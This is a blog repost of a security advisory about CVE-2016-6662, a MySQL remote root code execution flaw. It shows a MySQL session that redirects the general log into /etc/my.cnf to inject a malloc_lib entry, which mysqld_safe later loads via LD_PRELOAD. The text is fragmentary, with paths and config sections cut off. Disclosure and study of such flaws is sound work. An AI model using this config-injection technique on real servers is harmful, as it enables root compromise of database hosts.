MySQl Remote Root Code Execution 0day Exploit (CVE-2016-6662)

– Discovered by: Dawid Golunski
– dawid (at)

– CVE-2016-6662
– Release date: 12.09.2016
– Severity: Critical


MySQL set global general_log_file = ‘/etc/my.cnf’;
mysql> set global general_log = on;
mysql> select ‘
‘> ; injected config entry
‘> [mysqld]
‘> malloc_lib=/tmp/
‘> [separator]
‘> ‘;
1 row in set (0.00 sec)
mysql> set global general_log = off;

The resulting config would then have the following part appended:

root@debian:~/# cat /etc/my.cnf


key_buffer = 16M
max_allowed_packet = 16M

/usr/sbin/mysqld, Version: 5.5.50-0+deb8u1 ((Debian)). started with:
Tcp port: 3306 Unix socket: /var/run/mysqld/mysqld.sock
Time Id Command Argument
160728 17:25:14 40 Query select ‘

; injected config entry



160728 17:25:15 40 Query set global general_log = off

This config contains some redundant information that would normally cause MySQL
to fail to startup during a restart due to parsing issues.

However, the important part is that the config now contains the section:


mysqld_safe will read the shared library path correctly and add it to
the LD_PRELOAD environment variable before

Original URL:

Original article

Comments are closed.

Proudly powered by WordPress | Theme: Baskerville 2 by Anders Noren.

Up ↑

%d bloggers like this: